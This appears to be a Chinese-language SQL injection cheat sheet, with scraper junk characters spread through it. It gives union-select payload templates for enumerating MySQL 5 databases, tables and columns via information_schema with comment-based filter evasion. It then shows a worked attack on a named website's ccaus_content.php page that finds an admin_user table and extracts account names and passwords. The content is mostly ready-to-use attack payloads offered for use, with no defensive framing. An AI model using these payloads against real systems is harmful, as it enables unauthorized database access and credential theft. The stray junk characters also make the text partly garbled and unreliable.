查库% c2 v9 r% |8 y a4 j" O$ |/ C7 [( y
% Z' u- m9 D9 |4 E$ L
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
9 ]; h/ {$ W7 h k. c* m) O) G0 W, u9 _) H
& _/ c4 Z# z7 K5 S3 d8 i' e查表! U$ w4 T, F7 `- B4 F- c( u
; k; @% R" W' i( J2 w/ v; E- R% }) ~! gid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
5 h3 ^: e, P, t$ a
2 M k$ E5 k B" F" ]6 E; I查段1 J7 [2 d/ u- o5 B2 a5 g" v
6 t* Q% o& A: j6 ^: N2 wid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,18 l6 |1 j# c) z$ h2 ^6 X1 {) l
9 u9 F; `/ o6 G0 a1 d: _
+ V: t+ U. E5 }# R [- k7 Kmysql5高级注入方法暴表: o8 v/ X5 w/ T- `
& I- Z+ P& l( a$ E+ E7 z9 g e n3 \
例子如下:
% Q" }) X9 k/ _6 n2 y# G" w; ]6 E2 v& h5 V) W* e
1.爆表/ C" @5 v- T- y1 _+ \9 _% k
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
% v+ X1 P0 P! u9 F0 g! A1 v这样爆到第4个时出现了admin_user表。
. m9 A1 @- z) L6 Q4 P' {
) Y9 Y) S" G' Q2 B9 \' m& u$ k1 u2.暴字段
: T. `9 F! J2 Uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*( p, ~1 F# G( w. Q$ F
* s2 l c% b* J4 |1 B1 p. D3 W/ y- O
$ ~2 m" D5 Z! H' {3.爆密码" Z: e' c% f9 m" I) z: a$ B! K1 w8 F
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
' S) ]4 J) ~9 s W' R& b; L
0 D5 j7 ?8 F) v) D
$ [2 n; J) [; c |